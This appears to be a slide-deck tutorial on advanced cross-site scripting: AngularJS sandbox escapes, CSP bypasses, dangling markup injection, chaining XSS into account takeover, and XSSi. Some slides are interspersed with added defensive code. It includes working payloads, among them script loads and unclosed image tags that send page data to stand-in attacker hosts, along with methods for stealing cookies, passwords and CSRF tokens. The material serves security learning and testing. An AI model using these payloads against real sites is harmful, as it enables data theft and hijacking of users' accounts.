XSS - Advanced Techniques

The document is an advanced guide on XSS (Cross-Site Scripting) techniques, covering topics such as AngularJS sandboxing, Content Security Policy (CSP), dangling markup injection, chaining XSS, and XSSi. It explains how to bypass security measures, exploit vulnerabilities, and utilize various methods to execute malicious scripts. The guide serves as a comprehensive resource for understanding and exploiting XSS vulnerabilities in web applications.

Uploaded by

sangarecon123

Ultimate XSS Advanced guide

BY UNCLE RAT Aka The XSS Rat


Agenda
❏ AngularJS sandbox
❏ CSP
❏ Dangling markup injection
❏ Chaining XSS
❏ XSSi

AngularJS sandbox

AngularJS sandbox - what is it

❏ AngularJS is a front-end templating engine


❏ The AngularJS sandbox is a mechanism that denies expressions access to
dangerous objects
● e.g. window
● e.g. document
● …

AngularJS sandbox - what is it

❏ Bypassing the sandbox used to be very hard


❏ In AngularJS 1.6 researchers found several ways to escape it
❏ The sandbox was eventually removed in 1.6
❏ Many legacy applications still run versions < 1.6

AngularJS sandbox - how does it work

❏ Parses the expression
❏ Rewrites it into JS
❏ Checks whether the rewritten code is safe
● e.g. ensureSafeObject()

AngularJS sandbox - how can we escape?
❏ We need to trick the parser into thinking our JS is safe
❏ The most famous escape uses a modified charAt() function
❏ 'a'.constructor.prototype.charAt=[].join
● Overwrites the charAt() function with [].join
● Causes charAt() to return ALL characters of the string instead of one
● Because of the logic of isIdent() in AngularJS, it compares what it thinks is a
single character against a multi-character string
● This makes isIdent() always return true

AngularJS sandbox - how can we escape?
● Now that isIdent() always returns true, we can insert our JS code
● $eval('x=alert(1)')
● This is the AngularJS eval function
● Overwriting charAt only takes effect when sandboxed code is executed
● The AngularJS $eval forces the sandboxed code to run

// AngularJS lexer helper (as shown on the slide, name corrected to isIdent):
// decides whether a single character may start or continue an identifier.
// Note that nothing checks that ch is really one character long.
var isIdent = function(ch) {
  return ('a' <= ch && ch <= 'z' || 'A' <= ch && ch <= 'Z' || '_' === ch || ch === '$');
};
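Added example (not part of the slides, not AngularJS code): why the single-character isIdent() check accepts whole strings, and a strict variant that illustrates the fix. The lexerSeesIdentifier helper is a constructed model of the lexer calling text.charAt(index).

```javascript
// Lexer check as shown on the slide: written for exactly one character.
function isIdent(ch) {
  return ('a' <= ch && ch <= 'z' || 'A' <= ch && ch <= 'Z' || '_' === ch || ch === '$');
}

// JS compares strings lexicographically, so 'a' <= 'alert(1)' <= 'z' holds for
// any string that starts with a lowercase letter, not only for single chars.
// A check that refuses anything that is not exactly one character closes the gap.
function isIdentStrict(ch) {
  return typeof ch === 'string' && ch.length === 1 && isIdent(ch);
}

// Constructed model of how the lexer obtains ch: it calls text.charAt(index).
// Swapping the charAt implementation (the slide's [].join trick) changes what
// the check receives; a strict check still rejects the multi-character result.
function lexerSeesIdentifier(text, charAtImpl, check) {
  const ch = charAtImpl.call(text, 0);
  return check(ch);
}

// What [].join returns when used in place of charAt(0): the whole string,
// joined with the index "0" as separator.
function charAtAfterOverride(text) {
  return Array.prototype.join.call(text, 0);
}
```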
CSP

CSP - What is it?

❏ Content Security Policy


❏ Browser mechanism aimed at preventing XSS
❏ Works by only allowing content from certain sources
❏ Delivered in the Content-Security-Policy response header

CSP - how it works

❏ Content-Security-Policy: script-src 'self'


● Only allows JS originating from the page's own origin
❏ Content-Security-Policy: script-src https://scripts.normal-website.com
● Allows scripts only from that specific source website

CSP - how it works

❏ Besides script sources there are nonces


● Random value generated on the server for each response
● The value must be present in the HTML tag that loads the script
❏ There are also hashes
● A hash of the script's contents is listed in the policy

CSP - how do we bypass it?

❏ Do your own research as well, there are many techniques


❏ Policy injection
❏ Stealing the nonce with DOM clobbering
❏ Lack of object-src and default-src
❏ Wildcard
❏ 'unsafe-eval'
❏ 'unsafe-inline'

CSP bypass - 'unsafe-inline'

❏ Content-Security-Policy: script-src https://google.com 'unsafe-inline' https://*;
  child-src 'none';
  report-uri /Report-parsing-url;
❏ Working payload:
  "/><script>alert(1);</script>

https://book.hacktricks.xyz/pentestingweb/content-securitypolicy-csp-bypass

CSP bypass - 'unsafe-eval'

❏ Content-Security-Policy: script-src https://google.com 'unsafe-eval' data: https://*;
  child-src 'none';
  report-uri /Report-parsing-url;
❏ Working payload:
  <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

https://book.hacktricks.xyz/pentestingweb/content-securitypolicy-csp-bypass
CSP bypass - wildcard

❏ Content-Security-Policy: script-src 'self' https://google.com https: data: *;
  child-src 'none';
  report-uri /Report-parsing-url;
❏ Working payload:
  "/>'><script src=https://attacker.com/evil.js></script>

https://book.hacktricks.xyz/pentestingweb/content-securitypolicy-csp-bypass
CSP bypass-lack of object-src & default-src

❏ Content-Security-Policy: script-src 'self';
  report-uri /Report-parsing-url;
❏ Working payloads:

❏ <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

https://book.hacktricks.xyz/pentestingweb/content-securitypolicy-csp-bypass
CSP bypass-lack of object-src & default-src

❏ ">'><object type="application/x-shockwave-flash"
  data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//'>
  <param name="AllowScriptAccess" value="always"></object>

https://book.hacktricks.xyz/pentestingweb/content-securitypolicy-csp-bypass
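Added example (not from the slides or HackTricks): a small policy checker that parses a Content-Security-Policy header value and flags the weak settings the bypass slides rely on. The finding texts and the hardened sample policy in the usage are constructed.

```javascript
// Parse "directive value value; directive value" into {directive: [values]}.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    policy[name.toLowerCase()] = values;
  }
  return policy;
}

// Return one finding per weakness; an empty array means none of the
// slide's bypass preconditions is present.
function cspFindings(header) {
  const policy = parseCsp(header);
  const findings = [];
  // script-src falls back to default-src when absent.
  const scriptSources = policy['script-src'] || policy['default-src'] || [];
  for (const src of scriptSources) {
    const s = src.toLowerCase();
    if (s === "'unsafe-inline'") {
      findings.push("script-src allows 'unsafe-inline': injected <script> blocks run");
    } else if (s === "'unsafe-eval'") {
      findings.push("script-src allows 'unsafe-eval'");
    } else if (s === 'data:') {
      findings.push('script-src allows data: URIs: a payload can be embedded as a script URL');
    } else if (s === '*' || s === 'https:' || s === 'http:' || s === 'https://*') {
      findings.push('script-src allows any host (' + src + '): attacker-hosted scripts load');
    }
  }
  // Without object-src (or a default-src fallback) <object>/<embed> is unrestricted.
  if (!policy['object-src'] && !policy['default-src']) {
    findings.push('no object-src and no default-src: <object> can load attacker content');
  }
  return findings;
}

// Usage on the slide's 'unsafe-inline' policy and on a constructed hardened one.
console.log(cspFindings("script-src https://google.com 'unsafe-inline' https://*; child-src 'none'; report-uri /Report-parsing-url;"));
console.log(cspFindings("default-src 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'; base-uri 'none'"));
```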

Dangling markup injection

Dangling markup injection - not XSS

❏ Sometimes full XSS is not possible


❏ Dangling markup to the rescue!
❏ A technique to steal data that is present on the page

Dangling markup injection - not XSS

❏ <input type="text" name="input" value="CONTROLLABLE DATA HERE


❏ We might be able to insert "> here
❏ We might not be able to perform full XSS due to filtering
❏ But what if we inject "><img src='//attacker-website.com?
● Notice that the tag has no closing '> (dangling markup)
● This will create an image tag
● The browser will keep consuming HTML into the src attribute until it finds the next ' in the source code
● The image source will then request our webserver with the HTML up to that ' as part of the URL
● Our webserver access logs will contain an entry for that request with the data as the GET parameter
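Added example (not from the slides): a constructed page template with the reflected input from the slide, a minimal model of how the browser's single-quoted-attribute parsing swallows the following markup into the img src, and the attribute-escaping that prevents the tag from being created at all. The form, token and escape helper are constructed.

```javascript
// Constructed page: the reflected value is followed by a hidden CSRF token,
// which is the data at risk. escapeFn decides how the value is encoded.
function renderPage(reflected, escapeFn) {
  return '<form action="/transfer">' +
    '<input type="text" name="input" value="' + escapeFn(reflected) + '">' +
    '<input type="hidden" name="csrf" value="tok-0123456789">' +
    "<a href='/logout'>Logout</a></form>";
}

// Vulnerable rendering: the value goes into the attribute untouched.
const noEscape = (s) => s;

// Hardened rendering: HTML attribute escaping, so " and < cannot close the
// attribute or open a new tag.
const htmlAttrEscape = (s) => s
  .replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/'/g, '&#39;')
  .replace(/</g, '&lt;').replace(/>/g, '&gt;');

// Minimal model of the tokenizer's single-quoted attribute state: once src='
// is seen, every character up to the next ' belongs to the attribute value.
// Returns that value, or null when no <img src='...'> tag exists in the page.
function firstImgSrc(html) {
  const m = /<img\s+src='([^']*)'/i.exec(html);
  return m ? m[1] : null;
}

// The slide's payload: opens an <img> whose src quote is never closed.
const PAYLOAD = "\"><img src='//attacker-website.com?";

// What the browser would request for each rendering (null = no request made).
function leakedUrl(escapeFn) {
  return firstImgSrc(renderPage(PAYLOAD, escapeFn));
}
```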

Chaining XSS

Chaining XSS

❏ XSS to steal cookies


● The victim might not be logged in.
● Many applications hide their cookies from JavaScript using the
HttpOnly flag.
● Sessions might be locked to additional factors like the user's IP
address.
● The session might time out before you're able to hijack it.

Chaining XSS

❏ XSS to steal passwords


● Only works if the user has autofill enabled.
● The browser fills the password in for us.
● We can create a password-capture tool in JS.
● Only works if the victim uses autofill.

Chaining XSS

❏ XSS to steal the CSRF token


❏ Do ANYTHING you can do with JS
❏ Change an email address
● Request a password reset > account takeover
❏ Delete all the user's posts
❏ Change the default address and buy an item

XSSi

XSSi - what is it

❏ Sometimes JS files contain sensitive information


❏ Usually that JS can only be fetched when authenticated
❏ As a regular user we can't see that sensitive information
❏ So how do we get that sensitive information?
❏ When a file is loaded via a <script> tag, the SOP doesn't apply
❏ Scripts have to be loadable cross-domain
❏ We can abuse this to include the JS file with the secrets in it

XSSi - how to abuse it

❏ If the information is in a global JS variable

● <script src="https://www.vulnerabledomain.tld/script.js"></script>
● <script>alert(JSON.stringify(confidential_keys[0]));</script>
● First include the script, then read the data: with a regex, by searching
for keywords, with JSON.stringify, ...

XSSi - how to abuse it

❏ Dynamically generated JS
● Sometimes JS is generated dynamically per user
● It might contain sensitive info when authenticated
● To find out, request the JS with and without cookies
● The authenticated response will look different
● If the extra JS code is in a global variable we can use the code
from our previous example
● Otherwise we will need to overwrite the function that the script calls

❏ And many more possibilities …
